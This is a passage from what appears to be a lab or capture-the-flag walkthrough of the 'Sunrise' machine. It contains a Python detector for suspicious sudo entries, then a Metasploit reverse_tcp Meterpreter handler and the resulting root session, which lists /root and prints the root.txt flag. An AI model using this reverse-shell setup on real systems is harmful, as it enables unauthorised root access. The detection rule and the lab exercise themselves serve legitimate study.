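    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<command>.+)$")

# Directories any local user can write to; code launched from here as root
# was not installed by the package manager.  Assumed list, extend as needed.
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
CODE_LOADERS = {"wine"}


def parse_sudo_lines(text):
    """Return one dict per sudo entry; lines that are not sudo entries are ignored."""
    return [m.groupdict() for m in (SUDO_LINE.search(l) for l in text.splitlines()) if m]


def in_staging_dir(path):
    return any(path == d or path.startswith(d + "/") for d in STAGING_DIRS)


def detect(entries):
    """Return (summary, rule) pairs for suspicious sudo entries; rule names are assumptions."""
    alerts = []
    for e in entries:
        argv = e["command"].split()
        summary = f"{e['user']}->{e['runas']}: {e['command']}"
        # Resolve the binary and any path-like argument against PWD, so that
        # "wine foo.exe" run from /tmp is judged by where foo.exe really lives.
        # Heuristic: an argument is path-like if it contains "/" or ".".
        resolved = [posixpath.normpath(posixpath.join(e["pwd"], a))
                    for i, a in enumerate(argv) if i == 0 or "/" in a or "." in a]
        if any(in_staging_dir(p) for p in resolved):
            alerts.append((summary, "SUDO_FROM_STAGING_DIR"))
        if posixpath.basename(argv[0]) in CODE_LOADERS and any(a.lower().endswith(".exe") for a in argv[1:]):
            alerts.append((summary, "SUDO_WINE_EXE"))
    return alerts


if __name__ == "__main__":
    for summary, rule in detect(parse_sudo_lines(SAMPLE_AUTH_LOG)):
        print(f"{rule:<22} {summary}")
```

Both rules fire on the wine line even though the .exe was given as a relative name, because sudo records PWD alongside COMMAND; that is also why the wget download itself (an unprivileged command) is not what the rule keys on.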

When msfpc generates the payload it also writes a Metasploit Framework resource (.rc) file with the configuration the listener needs. Run that file; when the executable is launched with wine on the target, a session pops up. Because wine was executed through a root-privileged sudo shell, the session is root as well. Change into the root directory and list its files to find root.txt:

root@kali:~# msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[*] Processing /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc for ERB directives.
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> use exploit/multi/handler
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set LHOST 192.168.56.102
LHOST => 192.168.56.102
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set LPORT 443
LPORT => 443
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.56.102:443
msf5 exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (180320 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:443 -> 192.168.56.104:44876) at 2019-12-25 04:37:04 -0500
msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: sunrise\root
meterpreter > pwd
Z:\tmp
meterpreter > cd /root
meterpreter > ls
Listing: Z:\root
================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1602 fil 2019-12-05 17:24:31 -0500 .ICEauthority
100666/rw-rw-rw- 104 fil 2019-12-05 17:40:27 -0500 .Xauthority
100666/rw-rw-rw- 142 fil 2019-12-25 04:07:46 -0500 .bash_history
100666/rw-rw-rw- 570 fil 2010-01-31 06:52:26 -0500 .bashrc
40777/rwxrwxrwx 0 dir 2019-12-04 17:46:24 -0500 .cache
40777/rwxrwxrwx 0 dir 2019-12-04 15:48:21 -0500 .config
100666/rw-rw-rw- 35 fil 2019-12-04 15:46:34 -0500 .dmrc
40777/rwxrwxrwx 0 dir 2019-12-04 15:48:12 -0500 .gnupg
40777/rwxrwxrwx 0 dir 2019-12-04 14:29:33 -0500 .local
40777/rwxrwxrwx 0 dir 2019-12-04 17:46:29 -0500 .mozilla
100666/rw-rw-rw- 0 fil 2019-12-04 16:56:11 -0500 .odbc.ini
100666/rw-rw-rw- 148 fil 2015-08-17 11:30:33 -0400 .profile
40777/rwxrwxrwx 0 dir 2019-12-04 14:48:28 -0500 .rpmdb
100666/rw-rw-rw- 66 fil 2019-12-05 16:08:41 -0500 .selected_editor
40777/rwxrwxrwx 0 dir 2019-12-04 15:47:54 -0500 .ssh
100666/rw-rw-rw- 252 fil 2019-12-05 14:59:00 -0500 .wget-hsts
100666/rw-rw-rw- 2211 fil 2019-12-05 17:24:30 -0500 .xsession-errors
100666/rw-rw-rw- 2211 fil 2019-12-05 13:51:40 -0500 .xsession-errors.old
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Desktop
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Documents
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Downloads
40777/rwxrwxrwx 0 dir 2007-08-29 11:03:27 -0400 Groups
40777/rwxrwxrwx 0 dir 2007-08-29 11:03:27 -0400 Logs
40777/rwxrwxrwx 0 dir 2019-12-04 16:33:15 -0500 Manual
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Music
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Pictures
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Public
40777/rwxrwxrwx 0 dir 2019-12-04 16:33:15 -0500 Readme
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Templates
40777/rwxrwxrwx 0 dir 2007-08-29 11:03:26 -0400 Users
40777/rwxrwxrwx 0 dir 2019-12-04 15:46:51 -0500 Videos
100666/rw-rw-rw- 701 fil 2019-12-05 17:22:55 -0500 root.txt

meterpreter > cat root.txt
^^ @@@@@@@@@
^^ ^^ @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ ^^
@@@@@@@@@@@@@@@@@@@@
~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
~ ~~ ~ ~ ~~~~~~~~~~~~~~~~~~~~ ~ ~~ ~~ ~
~ ~~ ~~ ~~ ~~ ~~~~~~~~~~~~~ ~~~~ ~ ~~~ ~ ~~~ ~ ~~
~ ~~ ~ ~ ~~~~~~ ~~ ~~~ ~~ ~ ~~ ~~ ~
~ ~ ~ ~ ~ ~~ ~~~~~~ ~ ~~ ~ ~~
~ ~ ~ ~ ~~ ~ ~

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

24edb59d21c273c033aa6f1689b0b18c

Awesome!!! If you know more methods, tell me via QQ; my QQ: 1185151867

Game over

Sorry, this time I still couldn't find that Greek master's fool-proof one-click script. I am so sorry about this… It's a pity…

The end, to be continued…